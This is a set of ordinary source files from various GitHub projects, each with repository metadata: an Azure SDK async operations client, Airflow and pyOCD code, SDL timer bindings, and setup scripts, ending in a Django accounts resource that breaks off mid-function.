"symlink_target": ""
} |
from fladgejt.helpers import decode_key
from fladgejt.structures import Studium, ZapisnyList
def convert(rows):
    """Return a copy of *rows* with every value rendered as a string.

    votrfront currently expects all columns to be strings, so numbers are
    converted with ``str()`` and ``None`` becomes the empty string.
    """
    def _as_text(value):
        return '' if value is None else str(value)

    converted = []
    for row in rows:
        converted.append({key: _as_text(value) for key, value in row.items()})
    return converted
class RestStudiumMixin:
    """REST-backend implementation of the studium-related client calls."""

    def get_studia(self):
        """Fetch the user's studies and map each row to a Studium structure."""
        rows = convert(self.context.request_json('studium'))
        studia = []
        for row in rows:
            studia.append(Studium(
                sp_skratka=row['studijnyProgramSkratka'],
                sp_popis=row['studijnyProgramPopis'],
                sp_doplnujuce_udaje=row['studijnyProgramDoplnujuceUdaje'],
                zaciatok=row['zaciatokStudia'],
                koniec=row['koniecStudia'],
                sp_dlzka=row['studijnyProgramDlzka'],
                sp_cislo=row['studijnyProgramIdProgramCRS'],
                rok_studia=row['rokStudia'],
                organizacna_jednotka=row['organizacnaJednotka']))
        return studia

    def get_zapisne_listy(self, studium_key):
        """Fetch the enrollment sheets for the study identified by *studium_key*."""
        # The key packs the program abbreviation and the study start date.
        sp_skratka, zaciatok = decode_key(studium_key)
        rows = convert(self.context.request_json(
            "studium/zapisneListy",
            skratkaStudijnehoProgramu=sp_skratka,
            zaciatokStudia=zaciatok))
        listy = []
        for row in rows:
            listy.append(ZapisnyList(
                akademicky_rok=row['popisAkadRok'],
                rocnik=row['rokRocnik'],
                sp_skratka=row['studProgramSkratka'],
                sp_popis=row['studProgramPopis'],
                datum_zapisu=row['datumZapisu'],
                studium_key=studium_key))
        return listy
| {
"content_hash": "adca421d75723598c37db57e26afd4f2",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 87,
"avg_line_length": 42.30952380952381,
"alnum_prop": 0.5576814856499719,
"repo_name": "fmfi-svt/votr",
"id": "a830f7bcd175a4c932b014ea3187813861a00c74",
"size": "1778",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "fladgejt/rest/studium.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "131300"
},
{
"name": "Python",
"bytes": "264927"
},
{
"name": "SCSS",
"bytes": "9269"
}
],
"symlink_target": ""
} |
import pytest
from tests.providers.google.cloud.utils.gcp_authenticator import GCP_DATACATALOG_KEY
from tests.test_utils.gcp_system_helpers import CLOUD_DAG_FOLDER, GoogleSystemTest, provide_gcp_context
@pytest.mark.credential_file(GCP_DATACATALOG_KEY)
class CloudDataflowExampleDagsSystemTest(GoogleSystemTest):
    """System test that runs the ``example_gcp_datacatalog`` DAG end to end.

    NOTE(review): the class and method names say "Dataflow" but the DAG under
    test is Data Catalog — likely copy-paste residue; consider renaming.
    """
    @provide_gcp_context(GCP_DATACATALOG_KEY)
    def test_run_example_gcp_dataflow_native_java(self):
        # Executes the whole example DAG from the shared cloud DAG folder.
        self.run_dag('example_gcp_datacatalog', CLOUD_DAG_FOLDER)
| {
"content_hash": "342f471fc38c2dc030989707e02d5758",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 103,
"avg_line_length": 44.09090909090909,
"alnum_prop": 0.8020618556701031,
"repo_name": "sekikn/incubator-airflow",
"id": "724faf8dcc896197a4b946847da963193bcce235",
"size": "1272",
"binary": false,
"copies": "4",
"ref": "refs/heads/main",
"path": "tests/providers/google/cloud/operators/test_datacatalog_system.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "13715"
},
{
"name": "Dockerfile",
"bytes": "15900"
},
{
"name": "HTML",
"bytes": "151266"
},
{
"name": "JavaScript",
"bytes": "25486"
},
{
"name": "Jupyter Notebook",
"bytes": "2933"
},
{
"name": "Mako",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "10792443"
},
{
"name": "Shell",
"bytes": "243458"
},
{
"name": "TSQL",
"bytes": "879"
}
],
"symlink_target": ""
} |
from typing import Any, AsyncIterable, Callable, Dict, Optional, TypeVar, Union
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._build_service_agent_pool_operations import build_get_request, build_list_request, build_update_put_request_initial
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class BuildServiceAgentPoolOperations:
    """BuildServiceAgentPoolOperations async operations.
    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.
    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.appplatform.v2022_04_01.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """
    # NOTE(review): this class appears machine-generated (autorest-style);
    # prefer regenerating over hand-editing.
    models = _models
    def __init__(self, client, config, serializer, deserializer) -> None:
        # Pipeline client, (de)serializers and configuration are injected by
        # the generated service client that owns this operation group.
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config
    @distributed_trace
    def list(
        self,
        resource_group_name: str,
        service_name: str,
        build_service_name: str,
        **kwargs: Any
    ) -> AsyncIterable["_models.BuildServiceAgentPoolResourceCollection"]:
        """List build service agent pool.
        :param resource_group_name: The name of the resource group that contains the resource. You can
         obtain this value from the Azure Resource Manager API or the portal.
        :type resource_group_name: str
        :param service_name: The name of the Service resource.
        :type service_name: str
        :param build_service_name: The name of the build service resource.
        :type build_service_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either BuildServiceAgentPoolResourceCollection or the
         result of cls(response)
        :rtype:
         ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.appplatform.v2022_04_01.models.BuildServiceAgentPoolResourceCollection]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        api_version = kwargs.pop('api_version', "2022-04-01")  # type: str
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.BuildServiceAgentPoolResourceCollection"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        # Builds either the first-page request or a follow-up request for a
        # continuation link returned by the service.
        def prepare_request(next_link=None):
            if not next_link:
                request = build_list_request(
                    subscription_id=self._config.subscription_id,
                    resource_group_name=resource_group_name,
                    service_name=service_name,
                    build_service_name=build_service_name,
                    api_version=api_version,
                    template_url=self.list.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
            else:
                request = build_list_request(
                    subscription_id=self._config.subscription_id,
                    resource_group_name=resource_group_name,
                    service_name=service_name,
                    build_service_name=build_service_name,
                    api_version=api_version,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request
        # Deserializes one page into (next_link, items) for AsyncItemPaged.
        async def extract_data(pipeline_response):
            deserialized = self._deserialize("BuildServiceAgentPoolResourceCollection", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, AsyncList(list_of_elem)
        # Sends the request for one page and validates the HTTP status.
        async def get_next(next_link=None):
            request = prepare_request(next_link)
            pipeline_response = await self._client._pipeline.run(  # pylint: disable=protected-access
                request,
                stream=False,
                **kwargs
            )
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)
            return pipeline_response
        return AsyncItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/buildServices/{buildServiceName}/agentPools"}  # type: ignore
    @distributed_trace_async
    async def get(
        self,
        resource_group_name: str,
        service_name: str,
        build_service_name: str,
        agent_pool_name: str,
        **kwargs: Any
    ) -> "_models.BuildServiceAgentPoolResource":
        """Get build service agent pool.
        :param resource_group_name: The name of the resource group that contains the resource. You can
         obtain this value from the Azure Resource Manager API or the portal.
        :type resource_group_name: str
        :param service_name: The name of the Service resource.
        :type service_name: str
        :param build_service_name: The name of the build service resource.
        :type build_service_name: str
        :param agent_pool_name: The name of the build service agent pool resource.
        :type agent_pool_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: BuildServiceAgentPoolResource, or the result of cls(response)
        :rtype: ~azure.mgmt.appplatform.v2022_04_01.models.BuildServiceAgentPoolResource
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.BuildServiceAgentPoolResource"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = kwargs.pop('api_version', "2022-04-01")  # type: str
        request = build_get_request(
            subscription_id=self._config.subscription_id,
            resource_group_name=resource_group_name,
            service_name=service_name,
            build_service_name=build_service_name,
            agent_pool_name=agent_pool_name,
            api_version=api_version,
            template_url=self.get.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(  # pylint: disable=protected-access
            request,
            stream=False,
            **kwargs
        )
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('BuildServiceAgentPoolResource', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    get.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/buildServices/{buildServiceName}/agentPools/{agentPoolName}"}  # type: ignore
    # Initial (non-polling) PUT used by begin_update_put to start the LRO.
    async def _update_put_initial(
        self,
        resource_group_name: str,
        service_name: str,
        build_service_name: str,
        agent_pool_name: str,
        agent_pool_resource: "_models.BuildServiceAgentPoolResource",
        **kwargs: Any
    ) -> "_models.BuildServiceAgentPoolResource":
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.BuildServiceAgentPoolResource"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = kwargs.pop('api_version', "2022-04-01")  # type: str
        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]
        _json = self._serialize.body(agent_pool_resource, 'BuildServiceAgentPoolResource')
        request = build_update_put_request_initial(
            subscription_id=self._config.subscription_id,
            resource_group_name=resource_group_name,
            service_name=service_name,
            build_service_name=build_service_name,
            agent_pool_name=agent_pool_name,
            api_version=api_version,
            content_type=content_type,
            json=_json,
            template_url=self._update_put_initial.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(  # pylint: disable=protected-access
            request,
            stream=False,
            **kwargs
        )
        response = pipeline_response.http_response
        if response.status_code not in [200, 201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        # 200 = updated existing resource, 201 = created; both carry the body.
        if response.status_code == 200:
            deserialized = self._deserialize('BuildServiceAgentPoolResource', pipeline_response)
        if response.status_code == 201:
            deserialized = self._deserialize('BuildServiceAgentPoolResource', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _update_put_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/buildServices/{buildServiceName}/agentPools/{agentPoolName}"}  # type: ignore
    @distributed_trace_async
    async def begin_update_put(
        self,
        resource_group_name: str,
        service_name: str,
        build_service_name: str,
        agent_pool_name: str,
        agent_pool_resource: "_models.BuildServiceAgentPoolResource",
        **kwargs: Any
    ) -> AsyncLROPoller["_models.BuildServiceAgentPoolResource"]:
        """Create or update build service agent pool.
        :param resource_group_name: The name of the resource group that contains the resource. You can
         obtain this value from the Azure Resource Manager API or the portal.
        :type resource_group_name: str
        :param service_name: The name of the Service resource.
        :type service_name: str
        :param build_service_name: The name of the build service resource.
        :type build_service_name: str
        :param agent_pool_name: The name of the build service agent pool resource.
        :type agent_pool_name: str
        :param agent_pool_resource: Parameters for the update operation.
        :type agent_pool_resource:
         ~azure.mgmt.appplatform.v2022_04_01.models.BuildServiceAgentPoolResource
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
         this operation to not poll, or pass in your own initialized polling object for a personal
         polling strategy.
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either BuildServiceAgentPoolResource or the
         result of cls(response)
        :rtype:
         ~azure.core.polling.AsyncLROPoller[~azure.mgmt.appplatform.v2022_04_01.models.BuildServiceAgentPoolResource]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        api_version = kwargs.pop('api_version', "2022-04-01")  # type: str
        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]
        polling = kwargs.pop('polling', True)  # type: Union[bool, AsyncPollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.BuildServiceAgentPoolResource"]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        # Only issue the initial PUT when not resuming from a saved token.
        if cont_token is None:
            raw_result = await self._update_put_initial(
                resource_group_name=resource_group_name,
                service_name=service_name,
                build_service_name=build_service_name,
                agent_pool_name=agent_pool_name,
                agent_pool_resource=agent_pool_resource,
                api_version=api_version,
                content_type=content_type,
                cls=lambda x,y,z: x,
                **kwargs
            )
        kwargs.pop('error_map', None)
        def get_long_running_output(pipeline_response):
            response = pipeline_response.http_response
            deserialized = self._deserialize('BuildServiceAgentPoolResource', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        if cont_token:
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_update_put.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AppPlatform/Spring/{serviceName}/buildServices/{buildServiceName}/agentPools/{agentPoolName}"}  # type: ignore
| {
"content_hash": "511de24d574b5b36d8c7857d2d6a36dd",
"timestamp": "",
"source": "github",
"line_count": 338,
"max_line_length": 241,
"avg_line_length": 46.781065088757394,
"alnum_prop": 0.655135340247913,
"repo_name": "Azure/azure-sdk-for-python",
"id": "44f4ab35cbc5f0c910af96405b291959261e35f1",
"size": "16312",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/appplatform/azure-mgmt-appplatform/azure/mgmt/appplatform/v2022_04_01/aio/operations/_build_service_agent_pool_operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
from swgpy.object import *
def create(kernel):
	"""Build and return the Static object for this template.

	``kernel`` is accepted for template-factory compatibility; it is not
	used by this particular template.
	"""
	obj = Static()
	obj.template = "object/static/firework/shared_fx_01.iff"
	obj.attribute_template_id = -1
	obj.stfName("obj_n","unknown_object")

	#### BEGIN MODIFICATIONS ####
	#### END MODIFICATIONS ####

	return obj
"content_hash": "8ff901035f13b692fd0748960208d729",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 60,
"avg_line_length": 22.23076923076923,
"alnum_prop": 0.6816608996539792,
"repo_name": "obi-two/Rebelion",
"id": "bd5052c90a1248bd0b5379e9e9acd95b09c46425",
"size": "434",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/scripts/templates/object/static/firework/shared_fx_01.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
} |
"""
mbed CMSIS-DAP debugger
Copyright (c) 2006-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from target_kinetis import Kinetis
import logging
class K20D50M(Kinetis):
    """pyOCD target definition for the Kinetis K20D50M.

    Per the memory map below: 128 KB (0x20000) of flash at 0x0 in
    0x400-byte sectors, and 16 KB (0x4000) of RAM at 0x1fffe000.
    """

    # GDB-format memory map served to the debugger client.
    memoryMapXML = """<?xml version="1.0"?>
<!DOCTYPE memory-map PUBLIC "+//IDN gnu.org//DTD GDB Memory Map V1.0//EN" "http://sourceware.org/gdb/gdb-memory-map.dtd">
<memory-map>
    <memory type="flash" start="0x0" length="0x20000"> <property name="blocksize">0x400</property></memory>
    <memory type="ram" start="0x1fffe000" length="0x4000"> </memory>
</memory-map>
"""

    def __init__(self, transport):
        """Initialise the base Kinetis target, then set part-specific values."""
        super(K20D50M, self).__init__(transport)
        # ID register value for this part -- presumably consumed by the
        # Kinetis base class (not visible here).
        self.mdm_idr = 0x001c0000
        # Flash is programmed in 0x400-byte (one sector) pages.
        self.auto_increment_page_size = 0x400
| {
"content_hash": "0903a8425bcd83807c89bf3874286bbe",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 121,
"avg_line_length": 34.30555555555556,
"alnum_prop": 0.708502024291498,
"repo_name": "NordicSemiconductor/pyOCD",
"id": "f5d226919bde823268baa282324654227ae5ae20",
"size": "1235",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pyOCD/target/target_k20d50m.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "174778"
}
],
"symlink_target": ""
} |
"""Time management routines.
"""
__docformat__ = 'restructuredtext'
__version__ = '$Id: $'
from ctypes import *
from . import dll
SDL_GetTicks = dll.function(
'SDL_GetTicks',
'''Get the number of milliseconds since the SDL library initialization.
Note that this value wraps if the program runs for more than ~49 days.
:rtype: int
''',
args=[],
arg_types=[],
return_type=c_uint)
SDL_Delay = dll.function(
'SDL_Delay',
'''Wait a specified number of milliseconds before returning.
:Parameters:
`ms` : int
delay in milliseconds
''',
args=['ms'],
arg_types=[c_uint],
return_type=None)
_SDL_TimerCallback = CFUNCTYPE(c_int, c_uint)
_SDL_SetTimer = dll.private_function(
'SDL_SetTimer',
arg_types=[c_uint, _SDL_TimerCallback],
return_type=c_int)
_timercallback_ref = None # Keep global to avoid possible GC
def SDL_SetTimer(interval, callback):
    """Set a callback to run after the specified number of milliseconds has
    elapsed.
    The callback function is passed the current timer interval
    and returns the next timer interval. If the returned value is the
    same as the one passed in, the periodic alarm continues, otherwise a
    new alarm is scheduled. If the callback returns 0, the periodic alarm
    is cancelled.
    To cancel a currently running timer, call ``SDL_SetTimer(0, None)``.
    The timer callback function may run in a different thread than your
    main code, and so shouldn't call any functions from within itself.
    The maximum resolution of this timer is 10 ms, which means that if
    you request a 16 ms timer, your callback will run approximately 20 ms
    later on an unloaded system. If you wanted to set a flag signaling
    a frame update at 30 frames per second (every 33 ms), you might set a
    timer for 30 ms::
        SDL_SetTimer((33/10)*10, flag_update)
    If you use this function, you need to pass `SDL_INIT_TIMER` to
    `SDL_Init`.
    Under UNIX, you should not use raise or use SIGALRM and this function
    in the same program, as it is implemented using ``setitimer``. You
    also should not use this function in multi-threaded applications as
    signals to multi-threaded apps have undefined behavior in some
    implementations.
    :Parameters:
        `interval` : int
            Interval before callback, in milliseconds.
        `callback` : function
            Callback function should accept one argument, the number of
            milliseconds elapsed, and return the next timer interval,
            in milliseconds.
    """
    # Note SDL_SetTimer actually returns 1 on success, not 0 as documented
    # in SDL_timer.h.
    global _timercallback_ref
    if callback:
        # Wrap the Python callable so SDL can call it; the module-level
        # reference keeps the ctypes object alive while SDL holds it.
        _timercallback_ref = _SDL_TimerCallback(callback)
    else:
        # A NULL function pointer cancels any running timer.
        _timercallback_ref = _SDL_TimerCallback()
    # XXX if this fails the global ref is incorrect and old one will
    # possibly be collected early.
    if _SDL_SetTimer(interval, _timercallback_ref) == -1:
        # NOTE(review): `SDL` is never imported in this module (only ctypes
        # and `.dll`), so this raise would itself fail with NameError --
        # confirm how SDL.error is meant to be in scope here.
        raise SDL.error.SDL_Exception(SDL.error.SDL_GetError())
# For the new timer functions, the ``void *param`` passed to the C callback
# is ignored; a local closure is used instead (see SDL_AddTimer below).
# The SDL_TimerID type is not defined here, so c_void_p stands in for it.
_SDL_NewTimerCallback = CFUNCTYPE(c_uint, c_int, c_void_p)
_SDL_AddTimer = dll.private_function(
    'SDL_AddTimer',
    arg_types=[c_uint, _SDL_NewTimerCallback, c_void_p],
    return_type=c_void_p)
# Maps timer ID -> ctypes callback object, to keep callbacks alive until
# SDL_RemoveTimer is called for that ID.
_timer_refs = {} # Keep global to manage GC
def SDL_AddTimer(interval, callback, param):
    """Add a new timer to the pool of timers already running.
    :Parameters:
        `interval` : int
            The interval before calling the callback, in milliseconds.
        `callback` : function
            The callback function. It is passed the current timer
            interval, in milliseconds, and returns the next timer interval,
            in milliseconds. If the returned value is the same as the one
            passed in, the periodic alarm continues, otherwise a new alarm
            is scheduled. If the callback returns 0, the periodic alarm is
            cancelled. An example callback function is::
                def timer_callback(interval, param):
                    print('timer called after %d ms.' % interval)
                    return 1000 # call again in 1 second
        `param` : any
            A value passed to the callback function.
    :rtype: int
    :return: the timer ID
    """
    # The closure captures `param`, since SDL's own void* param is unused
    # (see module comment above _SDL_NewTimerCallback).
    def _callback(interval, _ignored_param):
        return callback(interval, param)
    func = _SDL_NewTimerCallback(_callback)
    result = _SDL_AddTimer(interval, func, None)
    if not result:
        # NOTE(review): `SDL` is never imported in this module; this raise
        # would itself fail with NameError -- confirm intended error path.
        raise SDL.error.SDL_Exception(SDL.error.SDL_GetError())
    # Keep the ctypes callback alive until SDL_RemoveTimer(result).
    _timer_refs[result] = func
    return result
# Raw binding; error_return=0 means a zero return is treated as failure by
# the dll helper. The public wrapper SDL_RemoveTimer (below) also drops the
# saved callback reference.
_SDL_RemoveTimer = dll.private_function(
    'SDL_RemoveTimer',
    args=['t'],
    arg_types=[c_void_p],
    return_type=c_int,
    error_return=0)
def SDL_RemoveTimer(t):
    """Remove one of the multiple timers knowing its ID.

    Also drops the module's saved reference to the ctypes callback so it
    can be garbage collected.

    :Parameters:
        `t` : int
            The timer ID, as returned by `SDL_AddTimer`.
    """
    _SDL_RemoveTimer(t)
    # pop() with a default so that removing an unknown or already-removed
    # timer ID does not raise KeyError (the previous `del` did).
    # (No `global` statement needed: we only mutate the dict in place.)
    _timer_refs.pop(t, None)
| {
"content_hash": "ebc54e54116431266f3bcf0a225c5f58",
"timestamp": "",
"source": "github",
"line_count": 165,
"max_line_length": 75,
"avg_line_length": 31.78787878787879,
"alnum_prop": 0.6585319351763584,
"repo_name": "dangillet/cocos",
"id": "b1843b7ce6824589d84de7697a318f1f52cb68c7",
"size": "5268",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "cocos/audio/SDL/timer.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "7097"
},
{
"name": "Makefile",
"bytes": "6766"
},
{
"name": "Python",
"bytes": "1352722"
}
],
"symlink_target": ""
} |
import oandapyV20

# Fill in your own credentials before running. The placeholders are empty
# strings (the original bare `name = #comment` lines were SyntaxErrors).
account_id = ""  # insert YOUR account_id here
key = ""         # insert your API access key here

# API client against the OANDA practice (demo) environment.
api = oandapyV20.API(environment="practice", access_token=key)
| {
"content_hash": "1336685b77963c1a0950295e2927a512",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 62,
"avg_line_length": 30.8,
"alnum_prop": 0.7402597402597403,
"repo_name": "matteonicolo/Forex",
"id": "446881c1ed4a49dc6da1ede79ce071bfca26dfb5",
"size": "154",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "35668"
}
],
"symlink_target": ""
} |
from kludd.routes.interval import interval
from kludd.routes.specific import specific
| {
"content_hash": "65dc7192c25d14a82ffeb833272c0179",
"timestamp": "",
"source": "github",
"line_count": 2,
"max_line_length": 42,
"avg_line_length": 43,
"alnum_prop": 0.8604651162790697,
"repo_name": "Owlree/kludd",
"id": "d77b4a639ec4383d3274126276de81c72212c0d3",
"size": "86",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kludd/routes/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "15037"
}
],
"symlink_target": ""
} |
from setuptools import setup
# Packaging configuration for the django-museum app.
setup(name='django-museum',
      version='0.2.1',
      description='Manage different picture sizes easily in your Django project.',
      url='https://github.com/franciscomoma/django-museum',
      author='Francisco Molina',
      author_email='franciscomoma@gmail.com',
      license='MIT',
      packages=['museum'],
      # NOTE(review): dependencies are pinned to exact, quite old versions;
      # confirm they still install alongside the targeted Django release.
      install_requires=[
          'Pillow==4.1.1',
          'python-resize-image==1.1.11'
      ],
      classifiers=[
          'Environment :: Web Environment',
          'Framework :: Django',
          'Framework :: Django :: 1.10.7',
          'Intended Audience :: Developers',
          'Operating System :: OS Independent',
          'Programming Language :: Python',
          'Programming Language :: Python :: 3',
          'Programming Language :: Python :: 3.6'
      ],
zip_safe=False) | {
"content_hash": "5bc6e27a90e3605a5b0fec2f0545981f",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 82,
"avg_line_length": 33.92,
"alnum_prop": 0.5860849056603774,
"repo_name": "franciscomoma/django-museum",
"id": "36026482f61eebed767bbc72ee10d3b23f20083e",
"size": "848",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "11227"
}
],
"symlink_target": ""
} |
from django.shortcuts import render,redirect, get_object_or_404
import django_bolts.utils as cutils
from django.contrib.auth.models import User
from django.contrib.sites.models import get_current_site
from django.http import HttpResponseForbidden,HttpResponse
from django.template.loader import render_to_string
from django_bolts.views.resource import Resource
from django_bolts.views.decorators import view
from django_bolts.models import EmailConfirmation, RegistrationProfile
import json
def post_activation_email(self,request,user):
    """Render and send the post-activation notification e-mail to `user`.

    Despite the `self` parameter this is a module-level helper; it is
    called as ``post_activation_email(resource, request, user)`` from
    AccountsResource.activate.

    NOTE(review): ``RequestContext(self, request)`` passes the resource
    where RequestContext normally expects the HttpRequest as its first
    argument -- confirm this is intentional.
    """
    from django.template import RequestContext
    from django.utils.safestring import mark_safe
    from django.utils.text import normalize_newlines
    ctx = RequestContext(self,request)
    subject = render_to_string("registration/post_activation_email_subject.txt",{'user':user},ctx)
    content = render_to_string("registration/post_activation_email.txt",{'user':user},ctx)
    # E-mail subjects must be a single line: collapse newlines to spaces.
    normalized_text = normalize_newlines(subject)
    subject = mark_safe(normalized_text.replace('\n', ' '))
    user.email_user(subject,content)
class AccountsResource(Resource):
    """Resource bundling account views: registration, activation, e-mail
    confirmation, avatars/profiles, presence, and username/e-mail
    availability checks. Abstract: subclasses supply create_form/edit_form.
    """
    template_prefix = 'registration'   # template directory prefix
    verbose_name = 'accounts'
    url_prefix = 'accounts'
    create_form = None                 # registration form class (subclass sets)
    edit_form = None                   # profile edit form class (subclass sets)
    abstract = True
    def get_url_pattern(self):
        """Mount django.contrib.auth's URLs under the prefix, then append
        the base Resource patterns."""
        from django.conf.urls import patterns, include, url
        prefix = self.url_prefix
        urlpatterns = patterns( '',
            url(r'^%s/'%prefix, include('django.contrib.auth.urls')),
        )
        pattern = urlpatterns + Resource.get_url_pattern(self)
        return pattern
    @view("(\w+)")
    def activate(self,request,activation_key):
        """Activate the account for `activation_key`, send the follow-up
        e-mail, and redirect; renders the default template on failure."""
